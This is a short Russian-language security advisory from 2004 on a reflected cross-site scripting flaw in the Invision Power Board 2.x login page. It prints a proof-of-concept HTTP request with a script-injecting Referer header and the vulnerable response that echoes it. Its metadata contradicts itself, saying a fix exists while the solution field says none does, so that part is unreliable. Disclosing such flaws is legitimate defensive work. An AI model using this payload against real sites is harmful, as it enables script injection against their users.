Межсайтовый скриптинг в Invision Power Board

Дата публикации:
10.10.2004
Всего просмотров:
3374
Опасность:
Низкая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Invision Power Board 2.x
Уязвимые версии: Invision Power Board 2.х

Описание: Уязвимость в Invision Power Board позволяет удаленному пользователю выполнить XSS нападение.

Пример/Эксплоит:

GET /index.php?s=5875d919a790a7c429c955e4d65b5d54&act=Login&CODE=00 HTTP/1.0
Referer: "'/><script>alert()</script>
 
Result:
 
<...>
nvisionpower.com/index.php?s=7ff7c2ec2bc7f6e349b326dcee4cf41c&act=Login&CODE=01" method="post" name="LOGIN" onsubmit="return ValidateForm()"> 
<input type="hidden" name="referer" value="\"\'/><script>alert()</script>" /> 
<div class="borderwrap"> 
<div class="maintitle"><img src='style_images/1/nav_m.gif' border='0' alt='>' width='8' height='8' /> Log In</div> 
<div class="formsubtitle">Please enter your details below to log in</div> 
<div class="errorwrap"> 
<h4>Attention!
<...>

URL производителя: http://www.invisionboard.com/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

или введите имя

CAPTCHA